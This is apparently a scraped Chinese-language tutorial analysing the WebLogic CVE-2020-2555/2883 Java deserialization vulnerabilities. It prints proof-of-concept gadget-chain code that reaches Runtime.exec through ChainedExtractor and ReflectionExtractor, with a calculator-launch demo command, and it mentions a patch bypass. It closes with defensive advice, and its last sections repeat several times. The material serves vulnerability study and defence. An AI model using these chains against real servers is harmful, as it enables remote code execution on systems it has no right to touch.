WebLogic CVE-2020-2555 & 2883 漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
WebLogic CVE-2020-2555和CVE-2020-2883是两个相似的Java反序列化漏洞，攻击者可以通过构造恶意序列化对象实现远程代码执行(RCE)。这两个漏洞的核心利用点在于WebLogic中`com.tangosol.util<\/code>包中的ChainedExtractor<\/code>和ReflectionExtractor<\/code>类的滥用。<\/p>`

核心组件分析<\/h2>
ChainedExtractor 类<\/h3>
ChainedExtractor<\/code>类继承自AbstractCompositeExtractor<\/code>，其关键方法如下：<\/p>
public<\/span> class<\/span> ChainedExtractor<\/span> extends<\/span> AbstractCompositeExtractor {<\/span>
<\/span><\/span>    public<\/span> Object extract<\/span>(<\/span>Object oTarget)<\/span> {<\/span>
<\/span><\/span>        ValueExtractor[]<\/span> aExtractor =<\/span> this<\/span>.<\/span>getExtractors<\/span>();<\/span>
<\/span><\/span>        int<\/span> i =<\/span> 0<\/span>;<\/span>
<\/span><\/span>        for<\/span>(<\/span>int<\/span> c =<\/span> aExtractor.<\/span>length<\/span>;<\/span> i <<\/span> c &&<\/span> oTarget !=<\/span> null<\/span>;<\/span> ++<\/span>i)<\/span> {<\/span>
<\/span><\/span>            oTarget =<\/span> aExtractor[<\/span>i].<\/span>extract<\/span>(<\/span>oTarget);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> oTarget;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>特点：<\/p>

遍历m_aExtractor<\/code>数组(继承自父类)<\/li>
将数组中的每一项进行extract<\/code>操作<\/li>
将前一个操作的结果作为下一个extract<\/code>的参数<\/li>
<\/ul>
ReflectionExtractor 类<\/h3>
ReflectionExtractor<\/code>类提供了反射调用功能：<\/p>
public<\/span> class<\/span> ReflectionExtractor<\/span> extends<\/span> AbstractExtractor {<\/span>
<\/span><\/span>    public<\/span> Object extract<\/span>(<\/span>Object oTarget)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>oTarget ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            return<\/span> null<\/span>;<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            Class clz =<\/span> oTarget.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Method method =<\/span> this<\/span>.<\/span>m_methodPrev<\/span>;<\/span>
<\/span><\/span>                if<\/span> (<\/span>method ==<\/span> null<\/span> ||<\/span> method.<\/span>getDeclaringClass<\/span>()<\/span> !=<\/span> clz)<\/span> {<\/span>
<\/span><\/span>                    this<\/span>.<\/span>m_methodPrev<\/span> =<\/span> method =<\/span> ClassHelper.<\/span>findMethod<\/span>(<\/span>clz,<\/span> this<\/span>.<\/span>getMethodName<\/span>(),<\/span> this<\/span>.<\/span>getClassArray<\/span>(),<\/span> false<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                return<\/span> method.<\/span>invoke<\/span>(<\/span>oTarget,<\/span> this<\/span>.<\/span>m_aoParam<\/span>);<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>Exception var5)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> ensureRuntimeException(<\/span>var5,<\/span> clz.<\/span>getName<\/span>()<\/span> +<\/span> this<\/span> +<\/span> '('<\/span> +<\/span> oTarget +<\/span> ')'<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

可以通过method.invoke(oTarget, this.m_aoParam)<\/code>实现任意方法调用<\/li>
方法名(m_sMethod<\/code>)和参数(m_aoParam<\/code>)完全可控<\/li>
<\/ul>
漏洞利用链构造<\/h2>
基本利用原理<\/h3>
通过组合ChainedExtractor<\/code>和ReflectionExtractor<\/code>，可以构造类似Commons Collections(CC)链的攻击方式：<\/p>

使用ReflectionExtractor<\/code>构造方法调用链<\/li>
使用ChainedExtractor<\/code>将这些调用串联起来<\/li>
寻找触发点调用extract<\/code>方法<\/li>
<\/ol>
基础PoC示例<\/h3>
ReflectionExtractor first =<\/span> new<\/span> ReflectionExtractor(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[]{}});<\/span>
<\/span><\/span>ReflectionExtractor second =<\/span> new<\/span> ReflectionExtractor(<\/span>"invoke"<\/span>,<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{}});<\/span>
<\/span><\/span>ReflectionExtractor third =<\/span> new<\/span> ReflectionExtractor(<\/span>"exec"<\/span>,<\/span> new<\/span> Object[]{<\/span>new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> "open \/System\/Applications\/Calculator.app"<\/span>}});<\/span>
<\/span><\/span>
<\/span><\/span>ValueExtractor[]<\/span> valueExtractors =<\/span> new<\/span> ValueExtractor[]{<\/span>first,<\/span> second,<\/span> third};<\/span>
<\/span><\/span>ChainedExtractor puzzle =<\/span> new<\/span> ChainedExtractor(<\/span>valueExtractors);<\/span>
<\/span><\/span>puzzle.<\/span>extract<\/span>(<\/span>Runtime.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>完整利用链<\/h3>

触发点选择<\/strong> - LimitFilter<\/code>类的toString()<\/code>方法：<\/li>
<\/ol>
public<\/span> String toString<\/span>()<\/span> {<\/span>
<\/span><\/span>    StringBuilder sb =<\/span> new<\/span> StringBuilder(<\/span>"LimitFilter: ("<\/span>);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>m_comparator<\/span> instanceof<\/span> ValueExtractor)<\/span> {<\/span>
<\/span><\/span>        ValueExtractor extractor =<\/span> (<\/span>ValueExtractor)<\/span>this<\/span>.<\/span>m_comparator<\/span>;<\/span>
<\/span><\/span>        sb.<\/span>append<\/span>(<\/span>", top="<\/span>).<\/span>append<\/span>(<\/span>extractor.<\/span>extract<\/span>(<\/span>this<\/span>.<\/span>m_oAnchorTop<\/span>));<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    return<\/span> sb.<\/span>toString<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
最终触发<\/strong> - 通过BadAttributeValueExpException<\/code>在反序列化时触发toString()<\/code>：<\/li>
<\/ol>
LimitFilter c =<\/span> new<\/span> LimitFilter();<\/span>
<\/span><\/span>c.<\/span>setComparator<\/span>(<\/span>b);<\/span> \/\/ b是ChainedExtractor实例
<\/span><\/span><\/span><\/span>c.<\/span>setTopAnchor<\/span>(<\/span>input);<\/span> \/\/ input是Runtime.class
<\/span><\/span><\/span><\/span>
<\/span><\/span>BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Field valfield =<\/span> val.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>valfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>valfield.<\/span>set<\/span>(<\/span>val,<\/span> c);<\/span>
<\/span><\/span><\/code><\/pre>JDK 7\/8通用PoC<\/h3>
由于BadAttributeValueExpException<\/code>在JDK7中不触发toString()<\/code>，需要使用PriorityQueue<\/code>替代：<\/p>
\/\/ 初始构造无害的extractor链
<\/span><\/span><\/span><\/span>ReflectionExtractor reflectionExtractor =<\/span> new<\/span> ReflectionExtractor(<\/span>"toString"<\/span>,<\/span> new<\/span> Object[]{});<\/span>
<\/span><\/span>ValueExtractor[]<\/span> valueExtractors1 =<\/span> new<\/span> ValueExtractor[]{<\/span>reflectionExtractor};<\/span>
<\/span><\/span>ChainedExtractor chainedExtractor1 =<\/span> new<\/span> ChainedExtractor(<\/span>valueExtractors1);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 初始化PriorityQueue
<\/span><\/span><\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> new<\/span> ExtractorComparator(<\/span>chainedExtractor1));<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射替换为恶意extractor链
<\/span><\/span><\/span><\/span>Class clazz =<\/span> ChainedExtractor.<\/span>class<\/span>.<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>Field m_aExtractor =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"m_aExtractor"<\/span>);<\/span>
<\/span><\/span>m_aExtractor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>m_aExtractor.<\/span>set<\/span>(<\/span>chainedExtractor1,<\/span> valueExtractors);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 替换queue数组内容
<\/span><\/span><\/span><\/span>Field f =<\/span> queue.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"queue"<\/span>);<\/span>
<\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object[]<\/span> queueArray =<\/span> (<\/span>Object[])<\/span> f.<\/span>get<\/span>(<\/span>queue);<\/span>
<\/span><\/span>queueArray[<\/span>0<\/span>]<\/span> =<\/span> Runtime.<\/span>class<\/span>;<\/span>
<\/span><\/span>queueArray[<\/span>1<\/span>]<\/span> =<\/span> "1"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>漏洞修复与绕过<\/h2>
CVE-2020-2883修复了第一条利用链的第二环节，但可以通过以下方式绕过：<\/p>

使用ConcurrentSkipListMap$SubMap<\/code>和Mutations<\/code>替代<\/li>
<\/ul>
总结与防御建议<\/h2>
技术要点总结<\/h3>

漏洞核心在于ChainedExtractor<\/code>和ReflectionExtractor<\/code>的滥用<\/li>
利用方式类似于Commons Collections反序列化漏洞<\/li>
需要根据目标JDK版本选择不同的触发链<\/li>
<\/ol>
防御措施<\/h3>

及时应用Oracle官方补丁<\/li>
限制WebLogic服务器对外暴露<\/li>
使用Java反序列化过滤器<\/li>
监控可疑的Java反序列化操作<\/li>
<\/ol>
参考链接<\/h3>

ZDI漏洞分析<\/a><\/li>
4hou技术分析<\/a><\/li>
<\/ol>

WebLogic CVE-2020-2555 & 2883 漏洞分析与利用教学<\/h1>

漏洞利用链构造<\/h2>

总结与防御建议<\/h2>

防御措施<\/h3> 及时应用Oracle官方补丁<\/li> 限制WebLogic服务器对外暴露<\/li> 使用Java反序列化过滤器<\/li> 监控可疑的Java反序列化操作<\/li> <\/ol> 参考链接<\/h3> ZDI漏洞分析<\/a><\/li> 4hou技术分析<\/a><\/li> <\/ol>

参考链接<\/h3> ZDI漏洞分析<\/a><\/li> 4hou技术分析<\/a><\/li> <\/ol>

防御措施<\/h3>

及时应用Oracle官方补丁<\/li>
限制WebLogic服务器对外暴露<\/li>
使用Java反序列化过滤器<\/li>
监控可疑的Java反序列化操作<\/li> <\/ol>
参考链接<\/h3>

ZDI漏洞分析<\/a><\/li>
4hou技术分析<\/a><\/li> <\/ol>

参考链接<\/h3>

ZDI漏洞分析<\/a><\/li>
4hou技术分析<\/a><\/li> <\/ol>